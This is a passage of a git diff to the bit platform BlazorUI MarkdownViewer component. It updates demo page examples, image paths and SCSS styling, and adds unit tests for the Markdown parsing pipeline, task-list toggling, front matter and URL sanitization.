+//     .UseUrlRewriter(context => context.IsImage && context.IsRelative
+//         ? ""https://cdn.example.com/"" + context.Url
+//         : context.Url)
+//     .Build();
+
+private readonly string baseUrlMarkdown = @""![the bit logo](bit-logo-blue.png)
+
+The image above is written with a relative path, the way a README in a repository writes one.
+An [absolute link](https://bitplatform.dev) is left alone.
+"";";
+
+    private readonly string example24RazorCode = @"
+<BitMarkdownViewer Dir=""BitDir.Rtl"" Markdown=""@localizedMarkdown"" Pipeline=""@localizedPipeline"" />";
+    private readonly string example24CsharpCode = @"
+private readonly BitMarkdownPipeline localizedPipeline = new BitMarkdownPipelineBuilder()
+    .UseGitHubFlavored()
+    .UseTexts(new BitMarkdownTexts
+    {
+        AlertNote = ""توجه"",
+        AlertTip = ""نکته"",
+        AlertImportant = ""مهم"",
+        AlertWarning = ""هشدار"",
+        AlertCaution = ""احتیاط"",
+        Footnotes = ""پی‌نوشت‌ها"",
+        FootnoteBackReference = ""بازگشت به ارجاع {0}"",
+        FootnoteBackReferenceOccurrence = ""بازگشت به ارجاع {0}-{1}"",
+        Table = ""جدول"",
+    })
+    .Build();";
+
+    private readonly string example25RazorCode = @"
 <div class=""mdv-playground"">
     <div class=""mdv-toolbar"">
         <span class=""mdv-label"">Flavor:</span>
@@ -925,7 +1841,7 @@ The whole native parser.
         </div>
     </div>
 </div>";
-    private readonly string example10CsharpCode = @"
+    private readonly string example25CsharpCode = @"
 private enum MarkdownFlavor { Basic, GitHub, Advanced }
 
 private MarkdownFlavor playgroundFlavor = MarkdownFlavor.Advanced;
@@ -949,16 +1865,16 @@ private string playgroundHint => playgroundFlavor switch
 {
     MarkdownFlavor.Basic => ""Basic CommonMark only - reference links and character references still work, but tables, strikethrough, task lists, footnotes, alerts, emoji and bare URLs render as plain text."",
     MarkdownFlavor.GitHub => ""The GitHub flavors: pipe tables, ~~strikethrough~~, task lists, autolink literals, footnotes and alerts."",
-    _ => ""Advanced: the GitHub flavors plus :sparkles: emoji and automatic heading ids.""
+    _ => ""Advanced: the GitHub flavors plus front matter, the emphasis extras, containers, definition lists, abbreviations, figures, :sparkles: emoji and automatic heading ids.""
 };";
 
-    private readonly string example11RazorCode = @"
+    private readonly string example26RazorCode = @"
 <BitMarkdownViewer Style=""border-inline-start:0.25rem solid var(--bit-clr-pri);padding-inline-start:1rem""
                    Markdown=""@(""A **styled** viewer, set apart with an inline `Style`."")"" />
 
 <BitMarkdownViewer Class=""custom-mdv""
                    Markdown=""@(""### A classy viewer\n\nEvery `code` span and heading inside it is restyled from the page's own stylesheet."")"" />";
-    private readonly string example11ScssCode = @"
+    private readonly string example26ScssCode = @"
 .custom-mdv {
     padding: 1rem;
     border-radius: 0.5rem;
@@ -974,11 +1890,11 @@ private string playgroundHint => playgroundFlavor switch
         background: $bit-color-background-primary-light;
     }
 }";
-    private readonly DemoCodeFile[] example11CodeFiles;
+    private readonly DemoCodeFile[] example26CodeFiles;
 
-    private readonly string example12RazorCode = @"
+    private readonly string example27RazorCode = @"
 <BitMarkdownViewer Dir=""BitDir.Rtl"" Markdown=""@rtlMarkdown"" Pipeline=""BitMarkdownPipelines.Advanced"" />";
-    private readonly string example12CsharpCode = @"
+    private readonly string example27CsharpCode = @"
 private readonly string rtlMarkdown = @""# نمایشگر مارک‌داون
 
 متن **درشت** و *مورب* در کنار `کد درون‌خطی`.
@@ -998,9 +1914,9 @@ private readonly string rtlMarkdown = @""# نمایشگر مارک‌داون
 
     public BitMarkdownViewerDemo()
     {
-        example11CodeFiles =
+        example26CodeFiles =
         [
-            new("BitMarkdownViewerDemo.razor.scss", example11ScssCode),
+            new("BitMarkdownViewerDemo.razor.scss", example26ScssCode),
         ];
     }
 }

--- a/src/BlazorUI/Demo/Client/Bit.BlazorUI.Demo.Client.Core/Pages/Components/Extras/MarkdownViewer/BitMarkdownViewerDemo.razor.cs
+++ b/src/BlazorUI/Demo/Client/Bit.BlazorUI.Demo.Client.Core/Pages/Components/Extras/MarkdownViewer/BitMarkdownViewerDemo.razor.cs
@@ -1,4 +1,4 @@
-﻿namespace Bit.BlazorUI.Demo.Client.Core.Pages.Components.Extras.MarkdownViewer;
+namespace Bit.BlazorUI.Demo.Client.Core.Pages.Components.Extras.MarkdownViewer;
 
 public partial class BitMarkdownViewerDemo
 {
@@ -213,9 +213,16 @@ public partial class BitMarkdownViewerDemo
                 new()
                 {
                     Name = "UseEmojis",
-                    Type = "BitMarkdownPipelineBuilder UseEmojis(IReadOnlyDictionary<string, string>? overrides)",
+                    Type = "BitMarkdownPipelineBuilder UseEmojis()",
                     DefaultValue = "",
-                    Description = "Adds :shortcode: emoji replacement, optionally extending the built-in map with per-pipeline overrides.",
+                    Description = "Adds :shortcode: emoji replacement, using the built-in map.",
+                },
+                new()
+                {
+                    Name = "UseEmojis",
+                    Type = "BitMarkdownPipelineBuilder UseEmojis(IReadOnlyDictionary<string, string> overrides)",
+                    DefaultValue = "",
+                    Description = "Adds :shortcode: emoji replacement, extending the built-in map with per-pipeline overrides. An override replaces the built-in shortcode of the same name.",
                 },
                 new()
                 {
@@ -914,11 +921,11 @@ this costs $5 and that one $10.
         .UseFigures()
         .Build();
 
-    private readonly string figureMarkdown = @"![The bit platform logo](/images/bit-logo-blue.png ""The logo, as a captioned figure"")
+    private readonly string figureMarkdown = @"![The bit platform logo](/_content/Bit.BlazorUI.Demo.Client.Core/images/bit-logo-blue.png ""The logo, as a captioned figure"")
 
 An image with no title stays an ordinary image:
 
-![The bit platform logo](/images/bit-logo-blue.png)
+![The bit platform logo](/_content/Bit.BlazorUI.Demo.Client.Core/images/bit-logo-blue.png)
 ";
 
 
@@ -973,7 +980,7 @@ Autolinks were left out, so https://bitplatform.dev stays plain text.
 
 A same-origin image always loads:
 
-![the bit logo](/images/bit-logo-blue.png)
+![the bit logo](/_content/Bit.BlazorUI.Demo.Client.Core/images/bit-logo-blue.png)
 
 A cross-origin one only loads under `All`:
 
@@ -1109,7 +1116,7 @@ A link to [another page here](/components/markdownviewer) is untouched, and so i
     // -- Rewriting URLs example ----------------------------------------------
 
     private readonly BitMarkdownPipeline baseUrlPipeline = new BitMarkdownPipelineBuilder()
-        .UseBaseUrl("/images/")
+        .UseBaseUrl("/_content/Bit.BlazorUI.Demo.Client.Core/images/")
         .Build();
 
     private readonly string baseUrlMarkdown = @"![the bit logo](bit-logo-blue.png)
@@ -1534,11 +1541,11 @@ private readonly BitMarkdownPipeline figurePipeline = new BitMarkdownPipelineBui
     .UseFigures()
     .Build();
 
-private readonly string figureMarkdown = @""![The bit platform logo](/images/bit-logo-blue.png """"The logo, as a captioned figure"""")
+private readonly string figureMarkdown = @""![The bit platform logo](/_content/Bit.BlazorUI.Demo.Client.Core/images/bit-logo-blue.png """"The logo, as a captioned figure"""")
 
 An image with no title stays an ordinary image:
 
-![The bit platform logo](/images/bit-logo-blue.png)
+![The bit platform logo](/_content/Bit.BlazorUI.Demo.Client.Core/images/bit-logo-blue.png)
 "";";
 
     private readonly string example14RazorCode = @"
@@ -1613,7 +1620,7 @@ private readonly string untrustedMarkdown = @""### Content from somewhere else
 
 A same-origin image always loads:
 
-![the bit logo](/images/bit-logo-blue.png)
+![the bit logo](/_content/Bit.BlazorUI.Demo.Client.Core/images/bit-logo-blue.png)
 
 A cross-origin one only loads under `All`:
 
@@ -1772,7 +1779,7 @@ A link to [another page here](/components/markdownviewer) is untouched, and so i
 </div>";
     private readonly string example23CsharpCode = @"
 private readonly BitMarkdownPipeline baseUrlPipeline = new BitMarkdownPipelineBuilder()
-    .UseBaseUrl(""/images/"")
+    .UseBaseUrl(""/_content/Bit.BlazorUI.Demo.Client.Core/images/"")
     .Build();
 
 // The general form, for a CDN or for stripping tracking parameters:
@@ -1875,7 +1882,7 @@ private string playgroundHint => playgroundFlavor switch
 <BitMarkdownViewer Class=""custom-mdv""
                    Markdown=""@(""### A classy viewer\n\nEvery `code` span and heading inside it is restyled from the page's own stylesheet."")"" />";
     private readonly string example26ScssCode = @"
-.custom-mdv {
+::deep .custom-mdv {
     padding: 1rem;
     border-radius: 0.5rem;
     background: $bit-color-background-secondary;

--- a/src/BlazorUI/Demo/Client/Bit.BlazorUI.Demo.Client.Core/Pages/Components/Extras/MarkdownViewer/BitMarkdownViewerDemo.razor.cs
+++ b/src/BlazorUI/Demo/Client/Bit.BlazorUI.Demo.Client.Core/Pages/Components/Extras/MarkdownViewer/BitMarkdownViewerDemo.razor.cs
@@ -1,4 +1,4 @@
-namespace Bit.BlazorUI.Demo.Client.Core.Pages.Components.Extras.MarkdownViewer;
+﻿namespace Bit.BlazorUI.Demo.Client.Core.Pages.Components.Extras.MarkdownViewer;
 
 public partial class BitMarkdownViewerDemo
 {
@@ -1706,8 +1706,8 @@ Formatting a value in place:
     private readonly string example20RazorCode = @"
 <BitMarkdownViewer Markdown=""@templatesMarkdown"" Pipeline=""BitMarkdownPipelines.GitHub"">
     <CodeBlockTemplate>
-        <div class=""code-card"">
-            <div class=""code-card-head"">
+        <div class=""mdv-code-card"">
+            <div class=""mdv-code-card-head"">
                 <span>@(context.Info ?? ""text"")</span>
                 <BitButton Size=""BitSize.Small"" Variant=""BitVariant.Text"" IconName=""@BitIconName.Copy"" Title=""Copy"" />
             </div>
@@ -1721,6 +1721,46 @@ Formatting a value in place:
         </BitLink>
     </LinkTemplate>
 </BitMarkdownViewer>";
+    private readonly string example20CsharpCode = @"
+private readonly string templatesMarkdown = @""Every code block below is drawn by the template, not by the viewer:
+
+```csharp
+var pipeline = new BitMarkdownPipelineBuilder().UseGitHubFlavored().Build();
+```
+
+```bash
+dotnet add package Bit.BlazorUI.Extras
+```
+
+And every link, like [the bit platform](https://bitplatform.dev), gets its own chrome.
+"";";
+    private readonly string example20ScssCode = @"
+// The code-block template's own chrome: a header naming the language beside a copy button,
+// with the block itself underneath.
+::deep .mdv-code-card {
+    margin-bottom: 1rem;
+    overflow: hidden;
+    border-radius: 0.5rem;
+    border: 1px solid $bit-color-border-secondary;
+}
+
+::deep .mdv-code-card-head {
+    display: flex;
+    gap: 0.5rem;
+    align-items: center;
+    justify-content: space-between;
+    padding: 0.25rem 0.25rem 0.25rem 0.75rem;
+    font-family: ui-monospace, SFMono-Regular, Menlo, Consolas, monospace;
+    font-size: 0.75rem;
+    color: $bit-color-foreground-secondary;
+    background: $bit-color-background-secondary;
+}
+
+::deep .mdv-code-card pre {
+    margin: 0;
+    border-radius: 0;
+}";
+    private readonly DemoCodeFile[] example20CodeFiles;
 
     private readonly string example21RazorCode = @"
 <BitMarkdownViewer Markdown=""@taskListMarkdown""
@@ -1921,6 +1961,11 @@ private readonly string rtlMarkdown = @""# نمایشگر مارک‌داون
 
     public BitMarkdownViewerDemo()
     {
+        example20CodeFiles =
+        [
+            new("BitMarkdownViewerDemo.razor.scss", example20ScssCode),
+        ];
+
         example26CodeFiles =
         [
             new("BitMarkdownViewerDemo.razor.scss", example26ScssCode),

--- a/src/BlazorUI/Demo/Client/Bit.BlazorUI.Demo.Client.Core/Pages/Components/Extras/MarkdownViewer/BitMarkdownViewerDemo.razor.scss
+++ b/src/BlazorUI/Demo/Client/Bit.BlazorUI.Demo.Client.Core/Pages/Components/Extras/MarkdownViewer/BitMarkdownViewerDemo.razor.scss
@@ -61,9 +61,102 @@
         box-sizing: border-box;
     }
 
+    // Two renderings of the same source, side by side, so the difference between them is
+    // the only thing that changes.
+    .mdv-columns {
+        display: flex;
+        gap: 16px;
+        align-items: flex-start;
+        width: 100%;
+    }
+
+    .mdv-column {
+        flex: 1 1 50%;
+        min-width: 0;
+        padding: 12px;
+        border: 1px solid $bit-color-border-secondary;
+        border-radius: 4px;
+        box-sizing: border-box;
+    }
+
+    .mdv-column-title {
+        margin-bottom: 8px;
+        font-size: 0.85em;
+        font-weight: 600;
+        opacity: 0.75;
+    }
+
+    // The table-of-contents rail beside the document it was read out of.
+    .mdv-toc-layout {
+        display: flex;
+        gap: 24px;
+        align-items: flex-start;
+        width: 100%;
+    }
+
+    .mdv-toc {
+        flex: 0 0 200px;
+        display: flex;
+        flex-direction: column;
+        gap: 4px;
+        padding-inline-end: 16px;
+        border-inline-end: 1px solid $bit-color-border-secondary;
+    }
+
+    .mdv-toc-title {
+        margin-bottom: 4px;
+        font-size: 0.85em;
+        font-weight: 600;
+        opacity: 0.75;
+    }
+
+    .mdv-toc-item {
+        color: inherit;
+        font-size: 0.9em;
+        text-decoration: none;
+
+        &:hover {
+            text-decoration: underline;
+        }
+    }
+
+    .mdv-toc-level-2 {
+        padding-inline-start: 12px;
+    }
+
+    .mdv-toc-level-3 {
+        padding-inline-start: 24px;
+        opacity: 0.8;
+    }
+
+    // The Style & Class example's own stylesheet.
+    .custom-mdv {
+        padding: 1rem;
+        border-radius: 0.5rem;
+        background: $bit-color-background-secondary;
+
+        h3 {
+            margin-top: 0;
+            color: $bit-color-primary;
+        }
+
+        code {
+            color: $bit-color-primary-dark;
+            background: $bit-color-background-primary-light;
+        }
+    }
+
     @media (max-width: 800px) {
-        .mdv-split {
+        .mdv-split,
+        .mdv-columns,
+        .mdv-toc-layout {
             flex-direction: column;
+        }
+
+        .mdv-toc {
+            flex: 0 0 auto;
+            padding-inline-end: 0;
+            border-inline-end: 0;
         }
     }
 }

--- a/src/BlazorUI/Demo/Client/Bit.BlazorUI.Demo.Client.Core/Pages/Components/Extras/MarkdownViewer/BitMarkdownViewerDemo.razor.scss
+++ b/src/BlazorUI/Demo/Client/Bit.BlazorUI.Demo.Client.Core/Pages/Components/Extras/MarkdownViewer/BitMarkdownViewerDemo.razor.scss
@@ -146,6 +146,32 @@
         }
     }
 
+    // The code-block template's own chrome: a header naming the language beside a copy button,
+    // with the block itself underneath.
+    .mdv-code-card {
+        margin-bottom: 1rem;
+        overflow: hidden;
+        border-radius: 0.5rem;
+        border: 1px solid $bit-color-border-secondary;
+    }
+
+    .mdv-code-card-head {
+        display: flex;
+        gap: 0.5rem;
+        align-items: center;
+        justify-content: space-between;
+        padding: 0.25rem 0.25rem 0.25rem 0.75rem;
+        font-family: ui-monospace, SFMono-Regular, Menlo, Consolas, monospace;
+        font-size: 0.75rem;
+        color: $bit-color-foreground-secondary;
+        background: $bit-color-background-secondary;
+    }
+
+    .mdv-code-card pre {
+        margin: 0;
+        border-radius: 0;
+    }
+
     @media (max-width: 800px) {
         .mdv-split,
         .mdv-columns,

--- a/src/BlazorUI/Tests/Bit.BlazorUI.Tests/Components/Extras/MarkdownViewer/BitMarkdownPipelineTests.cs
+++ b/src/BlazorUI/Tests/Bit.BlazorUI.Tests/Components/Extras/MarkdownViewer/BitMarkdownPipelineTests.cs
@@ -1,0 +1,258 @@
+﻿using Microsoft.VisualStudio.TestTools.UnitTesting;
+using System;
+using System.Collections.Generic;
+using System.Linq;
+using System.Threading.Tasks;
+
+namespace Bit.BlazorUI.Tests.Components.Extras.MarkdownViewer;
+
+/// <summary>
+/// Covers the Markdown pipeline itself - the part a caller uses without a component, and the
+/// part an extension author builds against.
+/// </summary>
+[TestClass]
+public class BitMarkdownPipelineTests
+{
+    [TestMethod]
+    public void BitMarkdownParserShouldParseWithTheBasicPipelineByDefault()
+    {
+        var document = BitMarkdownParser.Parse("# hello");
+
+        var heading = document.Children.Single() as BitMarkdownHeadingNode;
+
+        Assert.IsNotNull(heading);
+        Assert.AreEqual(1, heading.Level);
+        Assert.AreEqual("hello", BitMarkdownInlineHelpers.PlainText(heading.Inlines));
+    }
+
+    [TestMethod]
+    public void BitMarkdownParserShouldReturnAnEmptyDocumentForNullOrEmptySource()
+    {
+        Assert.AreEqual(0, BitMarkdownParser.Parse(null).Children.Count);
+        Assert.AreEqual(0, BitMarkdownParser.Parse(string.Empty).Children.Count);
+    }
+
+    [TestMethod]
+    public void BitMarkdownPipelineShouldSplitLinesOnEveryNewlineConvention()
+    {
+        var lf = BitMarkdownParser.Parse("a\n\nb");
+        var crlf = BitMarkdownParser.Parse("a\r\n\r\nb");
+        var cr = BitMarkdownParser.Parse("a\r\rb");
+
+        Assert.AreEqual(2, lf.Children.Count);
+        Assert.AreEqual(2, crlf.Children.Count);
+        Assert.AreEqual(2, cr.Children.Count);
+    }
+
+    [TestMethod]
+    public void BitMarkdownPipelineBuilderShouldApplyTheSameExtensionOnlyOnce()
+    {
+        var builder = new BitMarkdownPipelineBuilder()
+            .UseStrikethrough()
+            .UseStrikethrough();
+
+        // A second registration of the same delimiter character would throw at Build time.
+        var pipeline = builder.Build();
+
+        Assert.IsNotNull(pipeline);
+    }
+
+    [TestMethod]
+    public void BitMarkdownPipelineBuilderShouldRollBackAFailedExtensionSetup()
+    {
+        var builder = new BitMarkdownPipelineBuilder();
+        int blockParsers = builder.BlockParsers.Count;
+        int renderers = builder.Renderers.Count;
+
+        Assert.ThrowsExactly<InvalidOperationException>(() => builder.Use(new ThrowingExtension()));
+
+        Assert.AreEqual(blockParsers, builder.BlockParsers.Count);
+        Assert.AreEqual(renderers, builder.Renderers.Count);
+
+        // The builder is still usable, and the failed extension can be retried.
+        Assert.ThrowsExactly<InvalidOperationException>(() => builder.Use(new ThrowingExtension()));
+        Assert.IsNotNull(builder.UseStrikethrough().Build());
+    }
+
+    [TestMethod]
+    public void BitMarkdownPipelineShouldRejectTwoProcessorsClaimingTheSameDelimiter()
+    {
+        var builder = new BitMarkdownPipelineBuilder();
+        builder.DelimiterProcessors.Add(new BitMarkdownStrikethroughDelimiterProcessor());
+        builder.DelimiterProcessors.Add(new BitMarkdownStrikethroughDelimiterProcessor());
+
+        var exception = Assert.ThrowsExactly<InvalidOperationException>(() => builder.Build());
+
+        Assert.Contains("'~'", exception.Message);
+    }
+
+    [TestMethod]
+    public void BitMarkdownRendererShouldFailLoudlyForAnUnrenderableNode()
+    {
+        var renderer = BitMarkdownPipelines.Basic.CreateRenderer();
+
+        var exception = Assert.ThrowsExactly<InvalidOperationException>(
+            () => renderer.WriteNode(null!, new BitMarkdownStrikethroughNode()));
+
+        Assert.Contains(nameof(BitMarkdownStrikethroughNode), exception.Message);
+    }
+
+    [TestMethod]
+    public void BitMarkdownHeadingNodeShouldRejectALevelOutsideOneToSix()
+    {
+        Assert.ThrowsExactly<ArgumentOutOfRangeException>(() => new BitMarkdownHeadingNode { Level = 0 });
+        Assert.ThrowsExactly<ArgumentOutOfRangeException>(() => new BitMarkdownHeadingNode { Level = 7 });
+    }
+
+    [TestMethod]
+    public async Task BitMarkdownPipelineShouldBeSafeToShareAcrossConcurrentParses()
+    {
+        const string source = """
+            # Shared
+
+            A [reference][ref] and a note[^n] with ~~strikethrough~~ and :rocket:.
+
+            | a | b |
+            |---|---|
+            | 1 | 2 |
+
+            [ref]: /r
+            [^n]: The note.
+            """;
+
+        var expected = Describe(BitMarkdownPipelines.Advanced.Parse(source));
+
+        var results = await Task.WhenAll(Enumerable.Range(0, 32).Select(_ =>
+            Task.Run(() => Describe(BitMarkdownPipelines.Advanced.Parse(source)))));
+
+        foreach (var result in results)
+        {
+            Assert.AreEqual(expected, result);
+        }
+    }
+
+    [TestMethod]
+    public void BitMarkdownAstHelperShouldWalkDeeplyNestedTreesWithoutOverflowing()
+    {
+        // Deeper than the parser's own ceiling, to prove the traversal itself is iterative.
+        var document = new BitMarkdownDocumentNode();
+        document.Children.Add(Nest(50_000));
+
+        int count = BitMarkdownAstHelper.Descendants(document).Count();
+
+        Assert.AreEqual(50_000, count);
+
+        int lists = 0;
+        BitMarkdownAstHelper.VisitChildLists(document, _ => lists++);
+
+        // The document's own children, each block quote's, and the innermost paragraph's inlines.
+        Assert.AreEqual(50_001, lists);
+    }
+
+    [TestMethod]
+    public void BitMarkdownAstHelperShouldEnumerateInDocumentOrder()
+    {
+        var document = BitMarkdownParser.Parse("# one\n\n## two\n\n### three");
+
+        var headings = BitMarkdownAstHelper.Descendants(document)
+                                           .OfType<BitMarkdownHeadingNode>()
+                                           .Select(h => h.Level)
+                                           .ToArray();
+
+        CollectionAssert.AreEqual(new[] { 1, 2, 3 }, headings);
+    }
+
+    [TestMethod]
+    public void BitMarkdownListNodeShouldExposeItsItemsAsALiveView()
+    {
+        var list = new BitMarkdownListNode();
+        list.Items.Add(new BitMarkdownListItemNode());
+
+        var view = list.ChildLists.Single();
+
+        Assert.AreEqual(1, view.Count);
+
+        view.Add(new BitMarkdownListItemNode());
+
+        // The view writes through to the strongly typed collection.
+        Assert.AreEqual(2, list.Items.Count);
+        Assert.ThrowsExactly<ArgumentException>(() => view.Add(new BitMarkdownTextNode("x")));
+    }
+
+    [TestMethod]
+    [DataRow("Foo   Bar", "foo bar")]
+    [DataRow("  spaced  ", "spaced")]
+    [DataRow("MiXeD", "mixed")]
+    [DataRow("a\nb", "a b")]
+    public void BitMarkdownLinkHelpersShouldNormalizeLabelsTheWayCommonMarkMatchesThem(string label, string expected)
+    {
+        Assert.AreEqual(expected, BitMarkdownLinkHelpers.NormalizeLabel(label));
+    }
+
+    [TestMethod]
+    [DataRow("&amp;", "&")]
+    [DataRow("&#65;", "A")]
+    [DataRow("&#x41;", "A")]
+    [DataRow("a &notreal; b", "a &notreal; b")]
+    [DataRow("&#x1F680;", "\U0001F680")]
+    [DataRow("&#99999999;", "&#99999999;")]
+    public void BitMarkdownEntitiesShouldDecodeWhatItRecognizesAndLeaveTheRest(string input, string expected)
+    {
+        Assert.AreEqual(expected, BitMarkdownEntities.Decode(input));
+    }
+
+    [TestMethod]
+    public void BitMarkdownPipelineShouldConsultLowerOrderedInlineParsersFirst()
+    {
+        // The footnote parser (Order 10) shares '[' with the link parser (Order 100) and has
+        // to be offered the position first, whichever order they were registered in.
+        var pipeline = new BitMarkdownPipelineBuilder().UseFootnotes().Build();
+
+        var document = pipeline.Parse("a[^1]\n\n[^1]: note");
+
+        Assert.AreEqual(1, BitMarkdownAstHelper.Descendants(document).OfType<BitMarkdownFootnoteReferenceNode>().Count());
+        Assert.AreEqual(0, BitMarkdownAstHelper.Descendants(document).OfType<BitMarkdownLinkNode>().Count());
+    }
+
+    [TestMethod]
+    public void BitMarkdownPipelineShouldCapNestingDepthOnPathologicalInput()
+    {
+        var document = BitMarkdownPipelines.Basic.Parse(new string('>', 5_000) + " deep");
+
+        // Parsing completes instead of overflowing the stack; the surplus is plain text.
+        Assert.IsGreaterThan(0, document.Children.Count);
+    }
+
+    private static string Describe(BitMarkdownDocumentNode document)
+        => string.Join("|", BitMarkdownAstHelper.Descendants(document).Select(n => n switch
+        {
+            BitMarkdownTextNode t => "t:" + t.Text,
+            BitMarkdownHeadingNode h => "h" + h.Level,
+            BitMarkdownLinkNode l => "a:" + l.Url,
+            BitMarkdownFootnoteReferenceNode f => "fn:" + f.Number,
+            _ => n.GetType().Name
+        }));
+
+    private static BitMarkdownNode Nest(int depth)
+    {
+        // Built bottom-up so the fixture itself cannot recurse.
+        BitMarkdownNode node = new BitMarkdownParagraphNode();
+        for (int i = 1; i < depth; i++)
+        {
+            var quote = new BitMarkdownBlockquoteNode();
+            quote.Children.Add(node);
+            node = quote;
+        }
+        return node;
+    }
+
+    private sealed class ThrowingExtension : IBitMarkdownExtension
+    {
+        public void Setup(BitMarkdownPipelineBuilder builder)
+        {
+            builder.BlockParsers.Add(new BitMarkdownThematicBreakParser());
+            builder.Renderers.Add(new BitMarkdownStrikethroughRenderer());
+            throw new InvalidOperationException("setup failed");
+        }
+    }
+}

--- a/src/BlazorUI/Tests/Bit.BlazorUI.Tests/Components/Extras/MarkdownViewer/BitMarkdownPipelineTests.cs
+++ b/src/BlazorUI/Tests/Bit.BlazorUI.Tests/Components/Extras/MarkdownViewer/BitMarkdownPipelineTests.cs
@@ -223,6 +223,52 @@ public class BitMarkdownPipelineTests
         Assert.IsGreaterThan(0, document.Children.Count);
     }
 
+    [TestMethod]
+    public void BitMarkdownPipelineShouldShareOneRendererAcrossRenders()
+    {
+        var pipeline = BitMarkdownPipelines.GitHub;
+
+        // A renderer holds nothing but the pipeline's immutable renderer list, so the shared one
+        // is what every render uses instead of allocating a new instance each time.
+        Assert.AreSame(pipeline.Renderer, pipeline.Renderer);
+        Assert.AreNotSame(pipeline.Renderer, pipeline.CreateRenderer());
+    }
+
+    [TestMethod]
+    public void BitMarkdownPipelineShouldLetTheEmphasisExtrasAndStrikethroughShareTheTildeCharacter()
+    {
+        // Two processors claiming '~' would throw at Build time; the extras flavor replaces the
+        // strikethrough one instead, and strikethrough steps aside when it is already claimed.
+        Assert.IsNotNull(new BitMarkdownPipelineBuilder().UseStrikethrough().UseEmphasisExtras().Build());
+        Assert.IsNotNull(new BitMarkdownPipelineBuilder().UseEmphasisExtras().UseStrikethrough().Build());
+        Assert.IsNotNull(new BitMarkdownPipelineBuilder().UseGitHubFlavored().UseEmphasisExtras().Build());
+        Assert.IsNotNull(new BitMarkdownPipelineBuilder().UseEmphasisExtras().UseGitHubFlavored().Build());
+    }
+
+    [TestMethod]
+    public void BitMarkdownPipelineShouldKeepFrontMatterOutOfTheRenderedDocument()
+    {
+        var pipeline = new BitMarkdownPipelineBuilder().UseFrontMatter().Build();
+
+        var document = pipeline.Parse("---\na: 1\n---\n\n# t");
+
+        Assert.AreEqual(2, document.Children.Count);
+        Assert.IsInstanceOfType<BitMarkdownFrontMatterNode>(document.Children[0]);
+        Assert.IsInstanceOfType<BitMarkdownHeadingNode>(document.Children[1]);
+    }
+
+    [TestMethod]
+    public void BitMarkdownSmartyPantsShouldEducateOnlyWhatItIsGiven()
+    {
+        Assert.AreEqual("“a”", BitMarkdownSmartyPantsAstProcessor.Educate("\"a\""));
+        Assert.AreEqual("a–b", BitMarkdownSmartyPantsAstProcessor.Educate("a--b"));
+        Assert.AreEqual("a—b", BitMarkdownSmartyPantsAstProcessor.Educate("a---b"));
+        Assert.AreEqual("a…", BitMarkdownSmartyPantsAstProcessor.Educate("a..."));
+        Assert.AreEqual("don’t", BitMarkdownSmartyPantsAstProcessor.Educate("don't"));
+        // Nothing to educate is returned untouched, not rebuilt.
+        Assert.AreEqual("plain text", BitMarkdownSmartyPantsAstProcessor.Educate("plain text"));
+    }
+
     private static string Describe(BitMarkdownDocumentNode document)
         => string.Join("|", BitMarkdownAstHelper.Descendants(document).Select(n => n switch
         {

--- a/src/BlazorUI/Tests/Bit.BlazorUI.Tests/Components/Extras/MarkdownViewer/BitMarkdownPipelineTests.cs
+++ b/src/BlazorUI/Tests/Bit.BlazorUI.Tests/Components/Extras/MarkdownViewer/BitMarkdownPipelineTests.cs
@@ -269,6 +269,299 @@ public class BitMarkdownPipelineTests
         Assert.AreEqual("plain text", BitMarkdownSmartyPantsAstProcessor.Educate("plain text"));
     }
 
+    [TestMethod]
+    public void BitMarkdownTaskListShouldCountTheSameBoxesTheRendererDraws()
+    {
+        // A marker with no space after the bracket is not a task, and a scanner that thought it was
+        // shifted every index after it: the reader ticked one box and another one changed.
+        AssertBoxesAndCountAgree("- [ ]a\n- [ ] b\n");
+        Assert.AreEqual("- [ ]a\n- [x] b\n", BitMarkdownTaskList.Toggle("- [ ]a\n- [ ] b\n", 0, true));
+
+        // A quoted task is drawn, so it is counted and it can be ticked.
+        AssertBoxesAndCountAgree("> - [ ] a\n\n- [ ] b\n");
+        Assert.AreEqual("> - [x] a\n\n- [ ] b\n", BitMarkdownTaskList.Toggle("> - [ ] a\n\n- [ ] b\n", 0, true));
+        Assert.AreEqual("> - [ ] a\n\n- [x] b\n", BitMarkdownTaskList.Toggle("> - [ ] a\n\n- [ ] b\n", 1, true));
+
+        // A fence indented under a nested list item is still a fence, so the task inside it is
+        // still not one.
+        const string fenced = "- a\n  - b\n    ```\n    - [ ] x\n    ```\n- [ ] y\n";
+        AssertBoxesAndCountAgree(fenced);
+        Assert.AreEqual(1, BitMarkdownTaskList.Count(fenced));
+        Assert.AreEqual("- a\n  - b\n    ```\n    - [ ] x\n    ```\n- [x] y\n",
+            BitMarkdownTaskList.Toggle(fenced, 0, true));
+    }
+
+    [TestMethod]
+    public void BitMarkdownTaskListShouldToggleTheMarkerACheckboxWasParsedFrom()
+    {
+        const string markdown = "> - [ ] quoted\n\n- [ ] top\n";
+        var boxes = BitMarkdownAstHelper.Descendants(BitMarkdownPipelines.GitHub.Parse(markdown))
+            .OfType<BitMarkdownTaskCheckboxNode>().ToList();
+
+        Assert.AreEqual(2, boxes.Count);
+        // Each box knows the line it came from, so nothing has to be searched for again.
+        Assert.AreEqual(0, boxes[0].SourceLine);
+        Assert.AreEqual(2, boxes[1].SourceLine);
+        Assert.AreEqual("> - [x] quoted\n\n- [ ] top\n", BitMarkdownTaskList.Toggle(markdown, boxes[0], true));
+        Assert.AreEqual("> - [ ] quoted\n\n- [x] top\n", BitMarkdownTaskList.Toggle(markdown, boxes[1], true));
+    }
+
+    [TestMethod]
+    public void BitMarkdownPipelineShouldGiveEachBuilderTextsOfItsOwn()
+    {
+        var builder = new BitMarkdownPipelineBuilder();
+        builder.Texts.AlertNote = "Hinweis";
+
+        // Overriding one word in place must not translate every other pipeline in the process.
+        Assert.AreEqual("Hinweis", builder.Build().Texts.AlertNote);
+        Assert.AreEqual("Note", BitMarkdownTexts.Default.AlertNote);
+        Assert.AreEqual("Note", new BitMarkdownPipelineBuilder().Build().Texts.AlertNote);
+        Assert.AreEqual("Note", BitMarkdownPipelines.GitHub.Texts.AlertNote);
+    }
+
+    [TestMethod]
+    public void BitMarkdownPipelineShouldSanitizeAReferenceDestinationForWhatUsesIt()
+    {
+        // An embedded raster image is a valid image source and never a valid link, so a definition
+        // resolving as an image is sanitized as one - not twice, once as each.
+        var image = BitMarkdownAstHelper
+            .Descendants(BitMarkdownParser.Parse("![dot][d]\n\n[d]: data:image/png;base64,iVBORw0KGgo="))
+            .OfType<BitMarkdownImageNode>().Single();
+        Assert.AreEqual("data:image/png;base64,iVBORw0KGgo=", image.Url);
+
